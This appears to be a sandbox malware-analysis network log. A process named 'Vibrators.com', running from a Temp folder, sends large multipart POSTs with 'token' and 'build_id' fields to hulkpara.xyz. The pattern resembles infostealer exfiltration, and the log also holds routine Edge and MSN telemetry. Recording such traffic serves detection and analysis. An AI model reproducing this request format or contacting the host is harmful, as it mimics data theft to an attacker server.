2024-12-18 20:09:38 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Wed, 18 Dec 2024 20:09:38 GMT Accept-CH: UA, Platform, Arch, Model, Mobile Location: /b2?rn=1734552576462&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=37276334F0DB6278260F766DF1DC6332&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=10C45b5c73650930056d0a01734552578; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=10C45b5c73650930056d0a01734552578; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 X-Cache: Miss from cloudfront Via: 1.1 487e773bc809cb87809f770954ce1e22.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH53-P1 X-Amz-Cf-Id: GDEsapBSBsrViw0Gt73w7U2tB5cwK0ohTHcinJJMJDbjqxqZJQH-1g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49820	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:37 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LFKXBA1N7QIEUAAA1NGV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 0d 0a 43 6f 6e 74 Data Ascii: ------LFKXBA1N7QIEUAAA1NGVContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------LFKXBA1N7QIEUAAA1NGVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LFKXBA1N7QIEUAAA1NGVCont
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:37 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49827	51.104.15.253	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:39 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552576460&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3869 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1
2024-12-18 20:09:39 UTC	3869	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 32 30 3a 30 39 3a 33 36 2e 34 35 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 37 32 37 63 36 37 2d 61 61 39 64 2d 34 61 30 64 2d 62 34 35 63 2d 63 30 33 30 31 30 36 61 37 38 37 64 22 2c 22 65 70 6f 63 68 22 3a 22 33 31 39 31 30 30 33 37 34 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-18T20:09:36.456Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"ef727c67-aa9d-4a0d-b45c-c030106a787d","epoch":"3191003749"},"app":{"locale
2024-12-18 20:09:40 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=eac22bd7451a4f6fae8610d22f12c1c2&HASH=eac2&LV=202412&V=4&LU=1734552579974; Domain=.microsoft.com; Expires=Thu, 18 Dec 2025 20:09:39 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=f54f5db3291b45488c72fd53dc52296b; Domain=.microsoft.com; Expires=Wed, 18 Dec 2024 20:39:39 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3514 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Wed, 18 Dec 2024 20:09:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49835	108.139.47.50	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:40 UTC	1012	OUT	GET /b2?rn=1734552576462&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=37276334F0DB6278260F766DF1DC6332&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=10C45b5c73650930056d0a01734552578; XID=10C45b5c73650930056d0a01734552578
2024-12-18 20:09:40 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Wed, 18 Dec 2024 20:09:40 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 3e7fb742ce78adbb687505d8440bf99c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: 4rZwuMpeoixG5gTo-rVQOscXWtIVNTl4n7uDWP62W_AiCiHR-K3W6Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49837	20.110.205.119	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:40 UTC	1261	OUT	GET /c.gif?rnd=1734552576462&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=39588361c2f94ab1858ca082b3082955&activityId=39588361c2f94ab1858ca082b3082955&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=16EDE2E0EE6B429ABE54DF9CBFB76838&MUID=37276334F0DB6278260F766DF1DC6332 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; SM=T
2024-12-18 20:09:41 UTC	982	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT Accept-Ranges: bytes ETag: "9270eb7934bdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=37276334F0DB6278260F766DF1DC6332; domain=.msn.com; expires=Mon, 12-Jan-2026 20:09:40 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=37276334F0DB6278260F766DF1DC6332; domain=c.msn.com; expires=Mon, 12-Jan-2026 20:09:40 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Wed, 25-Dec-2024 20:09:40 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Wed, 18-Dec-2024 20:19:40 GMT; path=/; SameSite=None; Secure; Date: Wed, 18 Dec 2024 20:09:40 GMT Connection: close Content-Length: 42
2024-12-18 20:09:41 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	49842	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:40 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PZ58QIMOZU37QIEU3E3E User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:40 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 Data Ascii: ------PZ58QIMOZU37QIEU3E3EContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------PZ58QIMOZU37QIEU3E3EContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------PZ58QIMOZU37QIEU3E3ECont
